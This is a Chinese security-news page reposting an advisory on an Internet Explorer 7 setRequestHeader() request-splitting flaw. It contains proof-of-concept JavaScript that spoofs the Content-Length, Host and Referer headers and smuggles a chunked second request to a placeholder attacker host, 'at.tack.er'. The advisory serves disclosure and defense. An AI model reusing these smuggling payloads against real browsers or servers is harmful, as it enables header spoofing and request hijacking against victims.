| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 安全365社区 |
安全365
收藏本站
设为首页
会员登录:
站内搜索: 新闻中心 系统安全 网络安全 安全技术 下载中心
| 新闻中心首页 | 新闻动态 | 安全公告 |
MS IE 7 setRequestHeader() 漏洞
MS IE 7 setRequestHeader() 请求拆分和渗透漏洞
作者:佚名 文章来源:互联网 点击数: 更新时间:2008-3-28 8:55:43

  受影响系统

  Microsoft Internet Explorer 7.0.5730.11

  - Microsoft Windows XP SP2

  描述:

  Internet Explorer是微软发布的非常流行的WEB浏览器。

  IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头,导致HTTP头信息欺骗。

  类似于以下javascript:

  var x=new XMLHttpRequest();

  x.open("POST","/");

  for(f=127;f<255;f++)

  try{

  x.setRequestHeader("Host"+String.fromCharCode(f),"Test");

  }catch(dd){}

  x.setRequestHeader("Connection","keep-alive");

  x.onreadystatechange=function (){

  if (x.readyState == 4){

  }

  }

  x.send("blah");

  会覆盖以下头:

  - Content-Length

  x.setRequestHeader("Content-Length"+String.fromCharCode(201),"0");

  x.setRequestHeader("Content-Length"+String.fromCharCode(233),"0");

  x.setRequestHeader("Content-Length"+String.fromCharCode(240)+String.fromCharCode(213),"0");

  - Host

  x.setRequestHeader("Host"+String.fromCharCode(223), "www.microsoft.com");

  - Referer

  x.setRequestHeader("Referer"+String.fromCharCode(205)+String.fromCharCode(155),"http://www.referrer.tld");

  x.setRequestHeader("Referer"+String.fromCharCode(237)+String.fromCharCode(155),"http://www.referrer.tld");

  Internet Explorer 7允许在setRequestHeader中设置Transfer Encoding: chunked头,导致Http请求拆分/渗透漏洞

  假设存在反射跨站脚本漏洞影响的站点与攻击者的站点托管在同一台主机上,且用户没有配置代理,由于IE7允许设置

  setRequestHeader("Transfer-Encoding","chunked");

  因此就允许将POST请求中的负载用作Web服务器的其他请求。例如:

  var x=new XMLHttpRequest();

  for(var i =0; i<1;i++){

  x.open("POST","/");

  x.setRequestHeader("Transfer-Encoding","chunked");

  x.setRequestHeader("Proxy-Connection","keep-alive");

  x.setRequestHeader("Connection","keep-alive");

  x.onreadystatechange=function (){

  if (x.readyState == 4){

  }

  }

  try{

  x.send("0\r\n\r\nPOST / HTTP/1.1\r\nHost:

  at.tack.er\r\nContent-Length: SOMELENGTH\r\n\r\n") }catch(r){} }

  请求会变为:

  POST / HTTP/1.1

  Accept: */*

  Accept-Language: it

  Transfer-Encoding: chunked

  Connection: keep-alive

  Cache-Control: no-cache

  Referer: http://vi.ct.im/

  UA-CPU: x86

  Accept-Encoding: gzip, deflate

  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;

  .NET CLR 2.0.50727; .NET CLR 1.1.4322)

  Host: at.tack.er

  Content-Length: 67

  0

  POST /?Send1 HTTP/1.1

  Host: at.tack.er

  Content-Length: TheLenghtOfTheNextRequest

  这样Web服务器就会打开套接字等待负载。
新闻录入:小张    责任编辑:小张 
  • 上一篇新闻:

  • 下一篇新闻: 没有了
    		•
    【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    IE7再爆URL解析漏洞 用户
    IE7漏洞xp2003远程劫持
    IE7第一个正式漏洞:弹窗
    苹果操作系统存严重漏洞
    MS06-015不完善 导致Win
    MiMMS媒体流处理远程栈溢
    JustSystems多个产品缓冲
    Microsoft Visual Studi
    Microsoft Windows Medi
    Microsoft IE多个代码执
    站长邮箱:webmaster@anquan365.com
    联系电话:86-10-67634029 点击这里给我发消息

    Copyright © 2006-2008 www.anquan365.com 北京华安普特网络科技有限公司 版权所有